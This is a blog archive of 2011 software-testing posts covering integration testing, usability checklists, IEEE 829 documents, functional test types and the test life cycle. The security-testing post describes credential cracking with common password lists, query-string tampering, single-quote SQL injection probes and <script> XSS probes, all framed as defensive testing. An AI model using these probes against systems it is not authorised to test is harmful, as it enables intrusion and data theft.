Thursday, April 21, 2011

Integration Testing: Why? What? & How?

Introduction:
There are various levels of testing:
Unit Testing, Integration Testing, System Testing, Acceptance Testing.
Each level of testing builds on the previous level.

“Unit testing” focuses on testing a unit of the code.
“Integration testing” is the next level of testing. This ‘level of testing’ focuses on testing the integration of “units of code” or components.

How does Integration Testing fit into the Software Development Life Cycle?
Even if a software component is successfully unit tested, in an enterprise n-tier distributed application it is of little or no value if the component cannot be successfully integrated with the rest of the application. Once unit tested components are delivered we then integrate them together. These “integrated” components are tested to weed out errors and bugs caused due to the integration. This is a very important step in the Software Development Life Cycle.

It is possible that different programmers developed different components.
A lot of bugs emerge during the integration step.
In most cases a dedicated testing team focuses on Integration Testing.

Prerequisites for Integration Testing:
Before we begin Integration Testing it is important that all the components have been successfully unit tested.

Integration Testing Steps:
Integration Testing typically involves the following Steps:
Step 1: Create a Test Plan
Step 2: Create Test Cases and Test Data
Step 3: If applicable create scripts to run test cases
Step 4: Once the components have been integrated execute the test cases
Step 5: Fix the bugs if any and re test the code
Step 6: Repeat the test cycle until the components have been successfully integrated

What is an ‘Integration Test Plan’?
As you may have read in the other articles in the series, this document typically describes one or more of the following:
  • How the tests will be carried out
  • The list of things to be Tested
  • Roles and Responsibilities
  • Prerequisites to begin Testing
  • Test Environment
  • Assumptions
  • What to do after a test is successfully carried out
  • What to do if test fails
  • Glossary

How to write an Integration Test Case?
Simply put, a Test Case describes exactly how the test should be carried out.
The Integration test cases specifically focus on the flow of data/information/control from one component to the other.
So the Integration Test cases should typically focus on scenarios where one component is being called from another. Also the overall application functionality should be tested to make sure the app works when the different components are brought together.
The various Integration Test Cases clubbed together form an Integration Test Suite. Each suite may have a particular focus. In other words different Test Suites may be created to focus on different areas of the application.
As mentioned before, a dedicated Testing Team may be created to execute the Integration test cases. Therefore the Integration Test Cases should be as detailed as possible.

Sample Test Case Table:
Test Case ID Test Case Description Input Data Expected Result Actual Result Pass/Fail Remarks
       
       

Additionally the following information may also be captured:
  • Test Suite Name
  • Tested By
  • Date
  • Test Iteration (One or more iterations of Integration testing may be performed)
Working towards Effective Integration Testing:
There are various factors that affect Software Integration and hence Integration Testing:

1) Software Configuration Management: Since Integration Testing focuses on Integration of components and components can be built by different developers and even different development teams, it is important the right versions of components are tested. This may sound very basic, but the biggest problem faced in n-tier development is integrating the right version of components. Integration testing may run through several iterations and to fix bugs components may undergo changes. Hence it is important that a good Software Configuration Management (SCM) policy is in place. We should be able to track the components and their versions. So each time we integrate the application components we know exactly what versions go into the build process.
2) Automate Build Process where Necessary: A Lot of errors occur because the wrong version of components were sent for the build or there are missing components. If possible write a script to integrate and deploy the components this helps reduce manual errors.
3) Document: Document the Integration process/build process to help eliminate the errors of omission or oversight. It is possible that the person responsible for integrating the components forgets to run a required script and the Integration Testing will not yield correct results.
4) Defect Tracking: Integration Testing will lose its edge if the defects are not tracked correctly. Each defect should be documented and tracked. Information should be captured as to how the defect was fixed. This is valuable information. It can help in future integration and deployment processes.

Summary:
Integration testing is the most crucial steps in Software Development Life Cycle. Different components are integrated together and tested. This can be a daunting task in enterprise applications where diverse teams build different modules and components.

Reference -
http://www.exforsys.com/tutorials/testing/integration-testing-whywhathow.html

Tuesday, April 19, 2011

Web Testing Checklist about Usability

Navigation -
  1. Is terminology consistent?
  2. Are navigation buttons consistently located?
  3. Is navigation to the correct/intended destination?
  4. Is the flow to destination (page to page) logical?
  5. Is the flow to destination the page top-bottom left to right?
  6. Is there a logical way to return?
  7. Are the business steps within the process clear or mapped?
  8. Are navigation standards followed?
Ease of Use -
  1. Are help facilities provided as appropriate?
  2. Are selection options clear?
  3. Are ADA standards followed?
  4. Is the terminology appropriate to the intended audience?
  5. Is there minimal scrolling and resizable screens?
  6. Do menus load first?
  7. Do graphics have reasonable load times?
  8. Are there multiple paths through site (search options) that are user chosen?
  9. Are messages understandable?
  10. Are confirmation messages available as appropriate?
Presentation of Information -
  1. Are fonts consistent within functionality?
  2. Are the company display standards followed?
  3. - Logos
    - Font size
    - Colors
    - Scrolling
    - Object use
  4. Are legal requirements met?
  5. Is content sequenced properly?
  6. Are web-based colors used?
  7. Is there appropriate use of white space?
  8. Are tools provided (as needed) in order to access the information?
  9. Are attachments provided in a static format?
  10. Is spelling and grammar correct?
  11. Are alternative presentation options available (for limited browsers or performance issues)?
How to interpret/Use Info -
  1. Is terminology appropriate to the intended audience?
  2. Are clear instructions provided?
  3. Are there help facilities?
  4. Are there appropriate external links?
  5. Is expanded information provided on services and products? (why and how)
  6. Are multiple views/layouts available?

Reference - http://testinglink.in/topics/web-testing-checklist-about-usability

Sunday, April 17, 2011

An approach for Security Testing of Web Applications

As more and more vital data is stored in web applications and the number of transactions on the web increases, proper security testing of web applications is becoming very important. Security testing is the process that determines that confidential data stays confidential (i.e. it is not exposed to individuals/ entities for which it is not meant) and users can perform only those tasks that they are authorized to perform (e.g. a user should not be able to deny the functionality of the web site to other users, a user should not be able to change the functionality of the web application in an unintended way etc.).

Some key terms used in security testing -

Before we go further, it will be useful to be aware of a few terms that are frequently used in web application security testing:

What is “Vulnerability”?
This is a weakness in the web application. The cause of such a “weakness” can be bugs in the application, an injection (SQL/ script code) or the presence of viruses.
What is “URL manipulation”?
Some web applications communicate additional information between the client (browser) and the server in the URL. Changing some information in the URL may sometimes lead to unintended behavior by the server.
What is “SQL injection”?
This is the process of inserting SQL statements through the web application user interface into some query that is then executed by the server.
What is “XSS (Cross Site Scripting)”?
When a user inserts HTML/ client-side script in the user interface of a web application and this insertion is visible to other users, it is called XSS.
What is “Spoofing”?
The creation of hoax look-alike websites or emails is called spoofing.

Security testing approach:

In order to perform a useful security test of a web application, the security tester should have good knowledge of the HTTP protocol. It is important to have an understanding of how the client (browser) and the server communicate using HTTP. Additionally, the tester should at least know the basics of SQL injection and XSS. Hopefully, the number of security defects present in the web application will not be high. However, being able to accurately describe the security defects with all the required details to all concerned will definitely help.

1. Password cracking:
The security testing on a web application can be kicked off by “password cracking”. In order to log in to the private areas of the application, one can either guess a username/ password or use some password cracker tool for the same. Lists of common usernames and passwords are available along with open source password crackers. If the web application does not enforce a complex password (e.g. with alphabets, number and special characters, with at least a required number of characters), it may not take very long to crack the username and password.
If username or password is stored in cookies without encrypting, attacker can use different methods to steal the cookies and then information stored in the cookies like username and password. For more details see article on "Website cookie testing".
2. URL manipulation through HTTP GET methods:
The tester should check if the application passes important information in the querystring. This happens when the application uses the HTTP GET method to pass information between the client and the server. The information is passed in parameters in the querystring. The tester can modify a parameter value in the querystring to check if the server accepts it.
Via HTTP GET request user information is passed to server for authentication or fetching data. Attacker can manipulate every input variable passed from this GET request to server in order to get the required information or to corrupt the data. In such conditions any unusual behavior by application or web server is the doorway for the attacker to get into the application.
3. SQL Injection:
The next thing that should be checked is SQL injection. Entering a single quote (‘) in any textbox should be rejected by the application. Instead, if the tester encounters a database error, it means that the user input is inserted in some query which is then executed by the application. In such a case, the application is vulnerable to SQL injection.
SQL injection attacks are very critical as attacker can get vital information from server database. To check SQL injection entry points into your web application, find out code from your code base where direct MySQL queries are executed on database by accepting some user inputs.
If user input data is crafted in SQL queries to query the database, attacker can inject SQL statements or part of SQL statements as user inputs to extract vital information from database. Even if attacker is successful to crash the application, from the SQL query error shown on browser, attacker can get the information they are looking for. Special characters from user inputs should be handled/escaped properly in such cases.
4. Cross Site Scripting (XSS):
The tester should additionally check the web application for XSS (Cross site scripting). Any HTML e.g. <HTML> or any script e.g. <SCRIPT>> should not be accepted by the application. If it is, the application can be prone to an attack by Cross Site Scripting.
Attacker can use this method to execute malicious script or URL on victim’s browser. Using cross-site scripting, attacker can use scripts like JavaScript to steal user cookies and information stored in the cookies.
Many web applications get some user information and pass this information in some variables from different pages.
E.g.: http://www.examplesite.com/index.php?userid=123&query=xyz
Attacker can easily pass some malicious input or <script> as a ‘&query’ parameter which can explore important user/server data on browser.
Important: During security testing, the tester should be very careful not to modify any of the following:
• Configuration of the application or the server
• Services running on the server
• Existing user or customer data hosted by the application
Additionally, a security test should be avoided on a production system.
The purpose of the security test is to discover the vulnerabilities of the web application so that the developers can then remove these vulnerabilities from the application and make the web application and data safe from unauthorized actions.

Reference - http://www.softwaretestinghelp.com/security-testing-of-web-applications/

Friday, April 15, 2011

Difference between various Specifications Documents – For Test Design, Test Cases & Test Procedures

IEEE 829 standard prescribes many specifications related documents. Three such documents are -
1. Test Design Specifications
2. Test Case Specifications
3. Test Procedure Specifications

Let us go a bit deeper into the salient features of each of these documents being crucially important in any testing effort.

1. Test Design Specification:

“A document specifying the test conditions (coverage items) for a test item, the detailed test approach and identifying the associated high level test cases.”

The objective of compiling test design specifications is to identify set of features or a combination of features to be tested and to identify the group of test cases that will adequately test those features. In addition to these it contains all types of refinements done to the approach described in the test plan.

The test design specification consists of following essential parts:

  1. Test design specification identifier: A unique identifier is to be allocated so that the test design specification document can be distinguished from all other documents.
  2. Features to be tested: It describes the test items and the features that are the object of this test design specification.
  3. Approach refinements: It describes the test techniques to be adopted for this test design.
  4. Test identification: It describes a comprehensive list of test cases associated with this test design. It provides a unique identifier and a short description for every test case.
  5. Acceptance criteria: It describes the criteria to confirm as to whether each feature has passed or failed during testing.
2. Test Case Specification:

“A document specifying a set of test cases (objective, inputs, test actions, expected results, and execution preconditions) for a test item.”

The objective of compiling the test case specifications is to specify in detail each test case listed in the test design specification.

The test case specification consists of following essential parts:

  1. Test case specification identifier: A unique identifier so that this document can be distinguished from all other documents.
  2. Test items: Identifies the items and features to be tested by the particular test case.
  3. Input specifications: It describes details of each & every input required by the particular test case.
  4. Output specifications: It describes each output expected after executing the particular test case.
  5. Environmental needs: It describes any special hardware, software, facilities, etc. required for the execution of the particular test case that were not listed in its associated test design specification.
  6. Special procedural requirements: It describes any special setup, execution, or cleanup procedures unique to the particular test case.
  7. Inter-case dependencies: It describes a comprehensive list of all test cases that must be executed prior to the particular test case.
3. Test Procedure Specification:

“A document specifying a sequence of actions for the execution of a test. Also known as test script or manual test script.”

The objective of compiling the test procedure specifications is to specify the steps for executing a test case and the process for determining whether the software passed or failed the test.

The test procedure specification consists of following essential parts:

  1. Test procedure specification identifier: A unique identifier is to be allocated so that the test procedure specification document can be distinguished from all other documents.
  2. Objective: It describes the objective of the test procedure and its corresponding test cases.
  3. Special requirements: It describes a comprehensive list of all special requirements for the execution of the particular test procedure.
  4. Procedure steps: It describes a comprehensive list of all steps of the procedure. Possible steps may consist of the following:
    • Set up
    • Start
    • Proceed
    • Measure
    • Shut Down
    • Restart
    • Stop & Finally
    • Wind up

Reference -
ISTQB Glossary of Testing Terms 2.1
http://www.softwaretestinggenius.com/articaldetails.php?mode=details&qry=764&parent=125

Wednesday, April 13, 2011

Six functional tests to ensure software quality

Six types of functional testing can be used to ensure the quality of the end product. Understand these testing types and scale the execution to match the risk to the project.

1. Ensure every line of code executes properly with Unit Testing.

Unit testing is the process of testing each unit of code in a single component. This form of testing is carried out by the developer as the component is being developed. The developer is responsible for ensuring that each detail of the implementation is logically correct. Unit tests are normally discussed in terms of the type of coverage they provide:
Function coverage: Each function/method executed by at least one test case.
Statement coverage: Each line of code covered by at least one test case (need more test cases than above).
Path coverage: Every possible path through code covered by at least one test case (need plenty of test cases).
Unit tests allow developers to continually ensure that a unit of code does what is intended even as associated units change. As the software evolves, unit tests are modified, serving as an up-to-date form of documentation.

2. Ensure every function produces its expected outcome with Functional Testing.

Functional testing addresses concerns surrounding the correct implementation of functional requirements. Commonly referred to as black box testing, this type of testing requires no knowledge of the underlying implementation.
Functional test suites are created from requirement use cases, with each scenario becoming a functional test. As a component is implemented, the respective functional test is applied to it after it has been unit tested.
For many projects, it is unreasonable to test every functional aspect of the software. Instead, define functional testing goals that are appropriate for the project. Prioritize critical and widely used functions and include other functions as time and resources permit.
For detailed information on how to correctly develop use cases to support functional testing, refer to the Info-Tech Advisor research note, "Use Cases: Steer Clear of the Pitfalls."

3. Ensure all functions combine to deliver the desired business result with System Testing.

System testing executes end-to-end functional tests that cross software units, helping to realize the goal of ensuring that components combine to deliver the desired business result. In defining the project's system testing goals, focus on those scenarios that require critical units to integrate.
Also, consider whether all subsystems should be tested first or if all layers of a single subsystem should be tested before being combined with another subsystem.
Combining the various components together in one swift move should be avoided. The issue with this approach is the difficulty in localizing error. Components should be integrated incrementally after each has been tested in isolation.

4. Ensure new changes did not adversely affect other parts of the system with Regression Testing.

Regression testing ensures code modifications have not inadvertently introduced bugs into the system or changed existing functionality. Goals for regression testing should include plans from the original unit, as well as functional and system tests phases to demonstrate that existing functionality behaves as intended.
Determining when regression testing is sufficient can be difficult. Although it is not desirable to test the entire system again, critical functionality should be tested regardless of where the modification occurred. Regression testing should be done frequently to ensure a baseline software quality is maintained.

5. Ensure the system integrates with and does not adversely affect other enterprise systems with System Integration Testing.

System integration testing is a process that assesses the software's interoperability and cooperation with other applications. Define testing goals that will exercise required communication. (It is fruitless to test interaction between systems that will not collaborate once the developed system is installed.) This is done using process flows that encapsulate the entire system.
The need for a developed system to coexist with existing enterprise applications necessitates developing testing goals that can uncover faults in their integration. In the case that the new system is standalone software and there is no requirement for compatibility with any other enterprise system, system integration testing can be ignored.

6. Ensure the customer is satisfied with the system with Acceptance Testing.

Acceptance testing aims to test how well users interact with the system, that it does what they expect and is easy to use. Although it is the final phase of testing before software deployment, the tests themselves should be defined as early as possible in the SDLC. Early definition ensures customer expectations are set appropriately and confirms for designers that what they are building will satisfy the end user's requirements. To that end, acceptance test cases are developed from user requirements and are validated in conjunction with actual end users of the system. The process results in acceptance or rejection of the final product.

Reference - http://searchsoftwarequality.techtarget.com/report/Six-functional-tests-to-ensure-software-quality

Sunday, April 10, 2011

How a Good Bug Hunter Prioritizes his Bug Hunting Activities in Software Testing

Let us firstly understand as to what is a bug hunter?

A bug hunter is an experienced & enthusiastic exploratory tester. Good bug hunters usually do the following:
  1. Do initial exploratory testing of a suspect area, to develop ideas for more detailed attacks that can be performed by less experienced testers.
  2. Explore an area that is allegedly low risk - can he quickly find bugs that would lead to reassessment of the risk?
  3. Troubleshoot key areas that seem prone to irreproducible bugs.
  4. Find critical bugs that will convince the project manager to slip a (premature) release date.

How to prioritize the bug hunting activities?

Generally the mission of a good bug hunter is finding bugs that are important (as opposed to insignificant) and finding them quickly. If so, what does this mean in terms of the tests that are run?
You can use following suggestions to prioritize bug hunting in your software testing effort.
  1. Test things that are changed before things that are the same. Fixes and updates mean fresh risk.
  2. Test core functions before contributing functions. Test the critical and the popular things that the product does. Test the functions that make the product what it is.
  3. Test capability before reliability. Test whether each function can work at all before going deep into the examination of how any one function performs under many different conditions.
  4. Test common situations before esoteric situations. Use popular data and scenarios of use.
  5. Test common threats before exotic threats. Test with the most likely stress and error situations.
  6. Test for high-impact problems before low-impact problems. Test the parts of the product that would do a lot of damage in case of failure.
  7. Test the most wanted areas before areas not requested. Test any areas and for any problems that are of special interest to someone else on the team.
Conclusion: You will also find important problems sooner if you know more about the product, the software and hardware it must interact with, and the people who will use it. Study these thoroughly.


Reference - http://www.softwaretestinggenius.com/articalDetails.php?qry=960

Tuesday, April 5, 2011

Software Test Process / STLC

I) Test Planning

(Primary Role: Test Lead/Team Lead)

Input:/Reference:
  1. Requirements specification
  2. Test Strategy
  3. Project plan
  4. Use cases/design docs/Prototype screen
  5. Process Guidelines docs
Templates:
  1. Review Report
  2. Test Plan
Roles:
  1. Test Lead/Team Lead: Test Planning
  2. Test Engineers: Contribution to Test plan
  3. BA: Clarifications on Requirements
Tasks:
  1. Understanding & Analyzing the Requirements
  2. Test Strategy Implementation
  3. Test Estimations (Time, Resources-Environmental, Human, Budget)
  4. Risk Analysis
  5. Team formation
  6. Configuration management plan
  7. Test Plan Documentation
  8. Test Environment set-up defining
Output:
          Test Plan Document


II) Test Design



Input:/Reference:
  1. Requirements specification
  2. Test Plan
  3. Use cases/design docs/Prototype screen
  4. Process Guidelines docs
Templates:
  1. Test scenarios
  2. Test case
  3. Test data
Roles:
  1. Test Engineers: Test case documentation
  2. Test Lead/Team Lead: Guidance, monitoring & Control
  3. BA: Clarifications on Requirements
Tasks:
  1. Creating Test scenarios
  2. Test case documentation
  3. Test data collection
Output:
  1. Test case Documents
  2. Test Data


III) Test Execution



Input:/Reference:
  1. Requirements specification
  2. Test Plan
  3. Test Case docs
  4. Test data
  5. Test Environment
Templates:
  1. Defect Report
  2. Test Report
Roles:
  1. Test engineers: Test execution
  2. Test Lead: Guidance, monitoring & Control
  3. BA: Clarifications on Requirements
  4. System Administrator/Network Administration: Test Environment set-up
Tasks:
  1. Forming Test Batches
  2. Verifying Test Environment set-up
  3. Test Execution
  4. Test reporting
  5. Defect Reporting
  6. Regression Testing
Output:
  1. Test Reports
  2. Opened/Closed Defect Reports


IV) Test Closure



Input:/Reference:
  1. Requirements
  2. Test Plan
  3. Test Reports
  4. Opened/Closed Defect Reports
Templates:
          Test Summary Report

Roles:
  1. Test Lead: decide when to stop testing & Creating Test summary Report
  2. Testers: Contribution
Tasks:
  1. Evaluating Exit criteria
  2. Collecting all facts from Testing activities
  3. Sending Test deliverables to the Customer
  4. Improvement suggestions for future projects
Output:
  1. Test Summary Report
  2. Test Deliverables (Test Plan, Test scenarios, Test cases, Test Data, Test Reports, Opened/Closed defect reports, Test Summary Report)


Reference - http://www.gcreddy.com/2010/01/synchronization.html

^ Go to Top